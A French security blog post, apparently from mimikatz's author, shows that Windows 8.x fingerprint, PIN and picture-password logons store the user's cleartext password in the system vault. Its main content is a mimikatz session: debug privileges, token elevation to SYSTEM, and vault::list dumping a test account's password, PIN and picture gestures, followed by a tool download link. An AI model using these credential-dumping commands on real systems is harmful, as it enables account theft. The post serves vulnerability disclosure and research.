Dans un post précédent j’abordais deux méthodes d’authentifications alternatives au mot de passe historique sous Windows 8.x ; le code pin ou l’image.
Mais Windows 8.x supporte maintenant nativement l’authentification biométrique, par exemple par empreinte digitale (http://technet.microsoft.com/library/dn344916.aspx).
Windows n’implémente pas une réelle architecture d’authentification biométrique, il vérifie dans une base interne que l’empreinte figure bien dans son référentiel et… retourne le mot de passe utilisateur en clair…
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Jan 23 2014 00:52:44) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 14 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # token::elevate Token Id : 0 User name : SID name : AUTORITE NT\Système 408 34205 AUTORITE NT\Système S-1-5-18 (04g,20p) Primary -> Impersonated ! * Process Token : 1347551 win81\Utilisateur S-1-5-21-650724876-2192615621-2148298248-1001 (14g,23p) Primary * Thread Token : 1354005 AUTORITE NT\Système S-1-5-18 (04g,20p) Impersonation (Delegation) mimikatz # vault::list Vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28} Name : Informations d’identification Web Path : C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 Items (3) 0. PIN Logon Credential Type : {b2e033f5-5fde-450d-a1bd-3791f465720c} LastWritten : 23/01/2014 22:39:26 Flags : 00000000 Ressource : PIN Logon Vault Resource Identity : 01 05 00 00 00 00 00 05 15 00 00 00 0c 46 c9 26 c5 a8 b0 82 08 6e 0c 80 e9 03 00 00 Authenticator : PackageSid : Property 0 : 1234 *Authenticator* : 77 00 61 00 7a 00 61 00 31 00 32 00 33 00 34 00 2f 00 00 00 *** Pin Logon *** User : win81\Utilisateur Password : waza1234/ PIN Code : 1234 1. WinBio CredProv Credential Type : {fec87291-14f6-40b6-bd98-7ff245986b26} LastWritten : 22/01/2014 23:53:14 Flags : 00000000 Ressource : WinBio CredProv Resource Identity : 01 05 00 00 00 00 00 05 15 00 00 00 0c 46 c9 26 c5 a8 b0 82 08 6e 0c 80 e9 03 00 00 Authenticator : PackageSid : Property 0 : 0c 00 00 00 0c 00 00 00 06 00 00 00 55 00 74 00 69 00 6c 00 69 00 73 00 61 00 74 00 65 00 75 00 72 00 00 00 77 00 69 00 6e 00 38 00 31 00 00 00 *Authenticator* : 77 00 61 00 7a 00 61 00 31 00 32 00 33 00 34 00 2f 00 00 00 *** Biometric *** User : win81\Utilisateur Password : waza1234/ Username [ 6] : Utilisateur 2. Picture Password Credential Type : {b4b8a12b-183d-4908-9559-bd8bce72b58a} LastWritten : 22/01/2014 22:34:16 Flags : 00000000 Ressource : Picture Password Vault Resource Identity : 01 05 00 00 00 00 00 05 15 00 00 00 0c 46 c9 26 c5 a8 b0 82 08 6e 0c 80 e9 03 00 00 Authenticator : PackageSid : Property 0 : 02 00 00 00 56 00 00 00 39 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 *Authenticator* : 77 00 61 00 7a 00 61 00 31 00 32 00 33 00 34 00 2f 00 00 00 *** Picture Password *** User : win81\Utilisateur Password : waza1234/ Background path : C:\ProgramData\Microsoft\Windows\SystemData\S-1-5-21-650724876-2192615621-2148298248-1001\ReadOnly\PicturePassword\background.png Picture password (grid is 150*100) [0] circle (x = 86 ; y = 57 ; r = 8) - anticlockwise [1] point (x = 47 ; y = 46) [2] point (x = 125 ; y = 46)
Le mot de passe utilisateur est, une fois de plus, stocké dans le coffre du système…
Téléchargement
La version alpha prenant en charge ces améliorations est disponible : http://blog.gentilkiwi.com/mimikatz